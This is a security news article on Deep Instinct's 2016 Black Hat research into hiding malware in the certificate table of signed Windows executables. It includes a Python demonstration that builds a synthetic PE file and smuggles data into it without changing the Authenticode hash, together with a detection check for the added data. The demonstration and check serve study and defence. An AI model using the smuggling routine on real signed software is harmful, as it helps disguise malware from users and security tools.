
Researchers Show How to Conceal Malware within Digitally Signed Files, Keeping Hashes Intact


Running an executable on a Windows PC triggers three steps. First, the operating system parses the file's PE headers. Second, it validates the digital certificate. Third, it verifies the file hash against the signature. A team of security researchers at Deep Instinct reverse engineered this sequence and found that when Windows computes the file hash it skips three fields of the PE file (the CheckSum field in the optional header, the Certificate Table entry in the data directory, and the attribute certificate table itself), so changing those fields does not invalidate the signature.

Deep Instinct's experts presented the technique in a whitepaper at the 2016 Black Hat conference in the USA, showing that malware can be concealed in, and executed from, a signed file without breaking the normal execution of the PE. Malware authors keep looking for ways to bypass detection and prevention, and they frequently rely on packers and encryption to do so, because security software can only inspect such a payload once it has unpacked the packed archive or decrypted the encrypted file. Packed and encrypted content can still be identified, both on disk and at execution time; the researchers show that their newly found method avoids this. Oodaloop.com reported this on August 9, 2016.

The researchers' proof-of-concept doesn't reveal the hidden code because the team placed it inside the attribute certificate table, the region the hash calculation skips, so neither the digital certificate nor the file hash is disturbed and both remain valid. The technique is effective enough that malware distributors would not even need to hide their code with packers, because many anti-virus products trust, or scan less aggressively, any file that carries a valid digital signature.
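The following Python is an added illustration of the two points above (the hashing rule that skips three fields, and data appended inside the attribute certificate table); it is not code from Deep Instinct, the whitepaper or this article. The PE32 image, the stand-in PKCS#7 blob (a bare DER SEQUENCE) and the payload are all constructed in the script, so it runs offline and contains no real binary or signature. Alongside the smuggling step it includes the check a defender would add: compare each WIN_CERTIFICATE entry's declared length with the DER length of the PKCS#7 blob it wraps and report the slack.

```python
"""Authenticode-style hashing of a PE image vs. data smuggled into its
attribute certificate table, plus a slack-space check. Every input below is
constructed here; nothing is a real binary or a real signature."""
import hashlib
import struct

FILE_ALIGN = 0x200
# Stand-in for a PKCS#7 SignedData blob: a DER SEQUENCE holding one INTEGER.
FAKE_PKCS7 = b"\x30\x06\x02\x04\x01\x02\x03\x04"


def build_pe(cert_blob: bytes) -> bytes:
    """Minimal PE32: headers, one .text section, then a single WIN_CERTIFICATE
    entry wrapping cert_blob (constructed sample, not a real executable)."""
    opt = bytearray(0xE0)                                    # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic = PE32
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, FILE_ALIGN)  # ImageBase, alignments
    struct.pack_into("<II", opt, 56, 0x2000, FILE_ALIGN)     # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 64, 0xDEADBEEF)              # CheckSum: skipped by the hash
    struct.pack_into("<H", opt, 68, 2)                       # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    section = b"\xC3" + b"\x90" * (FILE_ALIGN - 1)           # ret + nops (constructed .text)
    cert_off = FILE_ALIGN + len(section)                     # certificate table follows the section
    dw_len = (8 + len(cert_blob) + 7) & ~7                   # WIN_CERTIFICATE length, 8-byte aligned
    win_cert = struct.pack("<IHH", dw_len, 0x0200, 0x0002) + cert_blob  # rev 2, PKCS_SIGNED_DATA
    win_cert += b"\0" * (dw_len - len(win_cert))
    struct.pack_into("<II", opt, 128, cert_off, dw_len)      # data directory[4]: security
    hdr = bytearray(FILE_ALIGN)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                  # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, len(opt), 0x0102)  # COFF header
    hdr[0x58:0x58 + len(opt)] = opt
    struct.pack_into("<8sIIIIIIHHI", hdr, 0x138, b".text", 0x200, 0x1000,
                     len(section), FILE_ALIGN, 0, 0, 0, 0, 0x60000020)  # section header
    return bytes(hdr) + section + win_cert


def _locate(pe: bytes):
    """(checksum_off, cert_dir_entry_off, cert_table_off, cert_table_size), PE32 or PE32+."""
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt_off = pe_off + 24                                    # signature + 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    dir_base = opt_off + (96 if magic == 0x10B else 112)     # PE32 vs PE32+ directory start
    entry_off = dir_base + 4 * 8                             # IMAGE_DIRECTORY_ENTRY_SECURITY == 4
    cert_off, cert_size = struct.unpack_from("<II", pe, entry_off)
    return opt_off + 64, entry_off, cert_off, cert_size


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Hash everything except CheckSum, the certificate-table directory entry and
    the certificate table. Assumes sections are stored in file order."""
    checksum_off, entry_off, cert_off, cert_size = _locate(pe)
    h = hashlib.new(algo)
    h.update(pe[:checksum_off])
    h.update(pe[checksum_off + 4:entry_off])
    if cert_size == 0:
        h.update(pe[entry_off + 8:])
    else:
        h.update(pe[entry_off + 8:cert_off])
        h.update(pe[cert_off + cert_size:])                  # any bytes after the table
    return h.hexdigest()


def smuggle_into_cert_table(pe: bytes, payload: bytes) -> bytes:
    """Append payload inside the (single) WIN_CERTIFICATE entry and fix up dwLength
    and the directory Size so Windows still finds a well-formed table."""
    _, entry_off, cert_off, cert_size = _locate(pe)
    dw_len = struct.unpack_from("<I", pe, cert_off)[0]
    if dw_len != cert_size:
        raise ValueError("demo assumes exactly one WIN_CERTIFICATE entry")
    body = pe[cert_off:cert_off + dw_len] + payload
    new_len = (len(body) + 7) & ~7
    body = struct.pack("<I", new_len) + body[4:] + b"\0" * (new_len - len(body))
    out = bytearray(pe[:cert_off]) + body + pe[cert_off + cert_size:]
    struct.pack_into("<II", out, entry_off, cert_off, new_len)
    return bytes(out)


def _der_total_length(buf: bytes) -> int:
    """Header + content length of the DER element starting at buf[0]."""
    if buf[1] < 0x80:
        return 2 + buf[1]
    n = buf[1] & 0x7F
    return 2 + n + int.from_bytes(buf[2:2 + n], "big")


def cert_table_slack(pe: bytes):
    """Per WIN_CERTIFICATE entry: (offset, bytes beyond its DER PKCS#7 blob).
    Up to 7 bytes of alignment padding is normal and reported as 0."""
    _, _, cert_off, cert_size = _locate(pe)
    found, pos, end = [], cert_off, cert_off + cert_size
    while pos + 8 <= end:
        dw_len, _rev, ctype = struct.unpack_from("<IHH", pe, pos)
        body = pe[pos + 8:pos + dw_len]
        used = _der_total_length(body) if ctype == 0x0002 and body[:1] == b"\x30" else len(body)
        slack = len(body) - used
        found.append((pos, slack if slack > 7 else 0))
        pos += (dw_len + 7) & ~7                             # entries are 8-byte aligned
    return found


if __name__ == "__main__":
    clean = build_pe(FAKE_PKCS7)
    dirty = smuggle_into_cert_table(clean, b"SMUGGLED-PAYLOAD-0123456789")
    print("Authenticode hash unchanged:", authenticode_hash(clean) == authenticode_hash(dirty))
    print("Whole-file SHA-256 unchanged:", hashlib.sha256(clean).digest() == hashlib.sha256(dirty).digest())
    print("Certificate-table slack (offset, bytes):", cert_table_slack(dirty))
```

The smuggled file keeps the same Authenticode hash as the clean one, so a signature over that hash still verifies, while a plain hash of the whole file changes. The slack check is the practical counter-measure: a PKCS#7 blob is a DER SEQUENCE whose own length field says how long the real signature is, so anything in the WIN_CERTIFICATE entry beyond that length (past alignment padding) is data the signature never covers and deserves scanning. The `_der_total_length` helper is a minimal DER reader written for this example, not a library routine.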

The researchers explained at the conference that malware which sits on disk undetected is useful to the attackers, but worth little if it cannot carry out its task. They therefore built a PE Loader that runs the hidden PE file directly from memory.

The researchers also noted that the PE Loader does not work with 64-bit architectures.

Deep Instinct's research shows how easily malware can be hidden inside the digital-signature data of a file, the very mechanism meant to validate a file's origin and protect users against badware.

» SPAMfighter News - 8/16/2016
